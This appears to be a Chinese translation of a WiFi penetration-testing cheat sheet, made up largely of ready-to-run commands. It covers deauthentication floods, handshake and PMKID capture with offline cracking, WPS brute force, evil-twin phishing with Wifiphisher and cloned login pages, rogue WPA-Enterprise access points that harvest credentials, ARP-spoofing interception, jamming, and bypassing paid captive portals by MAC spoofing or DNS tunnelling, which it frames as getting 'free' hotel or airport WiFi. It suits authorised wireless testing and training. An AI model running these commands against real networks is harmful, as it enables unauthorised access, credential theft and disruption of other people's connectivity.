2.1. 认证门户
2.2. 中间人攻击
3.1. 无客户端
4.1. 破解四次握手
4.2. PMKID 攻击
4.3. 无 AP 攻击
5.1. 伪造接入点
5.2. 暴力破解
5.3. 支持的 EAP 方法
6.1. Krack 攻击与 Frag 攻击
6.2. OSINT
6.3. WiFi 干扰
6.4. 其他框架
7.1. 攻击路由器
7.2. 扫描器类型
7.3. 欺骗
VARIABLE=value
iwconfig $IFACE
ifconfig $IFACE
airmon-ng check kill
ifconfig $IFACE down
iwconfig $IFACE mode monitor
ifconfig $IFACE up
设置监听模式
运行 Airodump-ng
airodump-ng $IFACE -c $CHANNEL -e $ESSID
aireplay-ng -0 $NUMBER_DEAUTH_PACKETS -a $AP_MAC -c $CLIENT_MAC $IFACE
aireplay-ng -0 $NUMBER_DEAUTH_PACKETS -a $AP_MAC $IFACE
使用 Airodump-ng 列出网络,获取 AP 的 MAC 地址 ($AP_MAC) 和一个客户端的 MAC 地址 ($CLIENT_MAC)。不要停止捕获。
在另一个终端中,解除一个或所有客户端的认证。当 Airodump-ng 捕获到该网络的一次握手时,名称或 ESSID 会出现在第一个终端中:
aireplay-ng -0 $NUMBER_DEAUTH_PACKETS -a $AP_MAC -c $CLIENT_MAC $IFACE
使用 Airodump-ng 列出网络,获取 AP 的 MAC 地址 ($AP_MAC)。不要停止捕获。
2.a. 执行字典攻击
mdk3 $IFACE p -t $AP_MAC -f $DICTIONARY_PATH
2.b. 或执行暴力攻击
mdk3 $IFACE p -t $AP_MAC -с $AP_CHANNEL -b $CHARACTER_SET
字符集可以使用 l(小写字母)、u(大写字母)、n(数字)、c(小写+大写)、m(小写+大写+数字)或 a(所有可打印字符)。
使用 HTTrack 克隆一个网站
安装 Wifiphisher。将 HTTrack 的结果放入 wifiphisher/data/phishing-pages/new_page/html 的新文件夹中,并在 wifiphisher/data/phishing-pages/new_page/config.ini 中创建配置文件。
使用 python setup.py install 或 bin 中的二进制文件重新编译项目。
安装 hostapd 后,以下命令在最新的 Kali 版本中正常工作:
cd bin && ./wifiphisher -aI $IFACE -e $ESSID --force-hostapd -p $PLUGIN -nE
绕过认证门户的第一种方法是将自己的 MAC 地址更改为已认证用户的 MAC 地址
macchanger
自定义脚本,如 这个(Bash)
此外,还可以使用自动化脚本,例如:
第二种方法是创建 DNS 隧道。为此,需要拥有一个可访问的 DNS 服务器。可以使用此方法绕过认证门户,在酒店、机场等地方获得“免费”WiFi。
nslookup example.com
一条“A 记录”:dns.$DOMAIN 指向 $SERVER_IP(例如:dns.domain.com 139.59.172.117)
一条“NS 记录”:hack.$DOMAIN 指向 dns.$DOMAIN(例如:hack.domain.com dns.domain.com)
iodined -f -c -P $PASS -n $SERVER_IP 10.0.0.1 hack.$DOMAIN
在此处检查是否正常工作
在客户端上执行
iodine -f -P $PASS $DNS_SERVER_IP hack.$DOMAIN
ssh -D 8080 [email protected]
一旦进入网络,可以测试其是否易受中间人攻击。
使用 Ettercap 进行 ARP 欺骗攻击
使用 Wireshark 或 TCPdump 嗅探流量
使用 PCredz(Linux)或 Network Miner(Windows)分析流量
airodump-ng -c $AP_CHANNEL --bssid $AP_MAC -w $PCAP_FILE $IFACE
aireplay-ng -1 0 -e $AP_NAME -a $AP_MAC -h $MY_MAC $IFACE
aireplay-ng -3 -b $AP_MAC -h $MY_MAC $IFACE
aireplay-ng -0 1 -a $AP_MAC -c $STATION_MAC $IFACE
aircrack-ng $PCAP_FILE
airodump-ng -c $AP_CHANNEL --bssid $AP_MAC -w $PCAP_FILE $IFACE
aireplay-ng -0 1 -a $AP_MAC -c $STATION_MAC $IFACE
aircrack-ng -w $WORDLIST capture.cap
可以从这里获取字典。
pyrit -r $PCAP_FILE analyze
pyrit -r $PCAP_FILE -o $CLEAN_PCAP_FILE strip
pyrit -i $WORDLIST import_passwords
pyrit eval
pyrit batch
pyrit -r $CLEAN_PCAP_FILE attack_db
可以使用这个脚本或按照以下步骤:
安装 Hcxdumptool 和 Hcxtool(可以使用这个脚本)。
停止网络管理器
airmon-ng check kill
3a. 如果要对特定 MAC 地址进行攻击
echo $MAC | sed 's/://g' > $FILTER_FILE
hcxdumptool -i $IFACE -o $PCAPNG_FILE --enable_status=1 --filterlist=$FILTER_FILE --filtermode=2
hcxpcaptool -z $HASH_FILE $PCAPNG_FILE
每行的结构为:PMKID * 路由器 MAC * 站点 * ESSID(检查:https://www.rapidtables.com/convert/number/hex-to-ascii.html)
hashcat -a 0 -m 16800 $HASH_FILE $WORDLIST --force
如果你能访问一个客户端设备,该设备 Wi-Fi 已开启但周围没有网络,你仍然可以攻击该网络,前提是客户端设备之前连接过该网络。
为此,你需要使用 hostapd 创建一个伪造接入点,配置文件类似这个,使用任意密码但保持相同的网络名称。创建伪造网络后,客户端设备会尝试连接,你就能像本指南 4.1 节 那样获得四次握手。
如果你不想使用虚拟机,可以通过以下方式安装所有内容:
git clone https://github.com/ricardojoserf/WPA_Enterprise_Attack
cd WPA_Enterprise_Attack && sudo sh install.sh
启动接入点:
sh freeradius_wpe_init.sh $AP_NAME $INTERFACE
当客户端连接时,使用以下命令读取日志:
sh freeradius_wpe_read.sh
sh hostapd_wpe_init.sh $AP_NAME $INTERFACE
查找支持的 EAP 方法
这两个高级攻击由伟大的 Mathy Vanhoef 发现:
Krack Attack 脚本 - 在此网站上解释
Frag Attack 脚本 - 在此网站上解释
例如,以下命令可以解除除伪造接入点外所有设备的认证:
sudo ./wifijammer -i $IFACE -s $FAKE_AP_MAC
Linux:
Windows:
一旦连接到网络
Nmap/Zenmap - 安全扫描器、端口扫描器和网络探测工具
Masscan - Nmap 的更快版本(可能破坏某些东西,请小心)
Netdiscover - ARP 嗅探。当网络分段非常严格时非常有用
| 操作系统 | 平台 | 凭据 | 大小 | 链接 |
|---|
| Ubuntu 16.04.5 | VMware | ricardojoserf:wifi | 3.25 GB | MEGA |
| Kali 2019.1 | VMware | root:wifi | 4.99 GB | MEGA |
| Ubuntu 16.04.5 | VirtualBox (OVA) | ricardojoserf:wifi | 3.18 GB | MEGA |
| Kali 2019.1 | VirtualBox (OVA) | root:wifi | 5.56 GB | MEGA |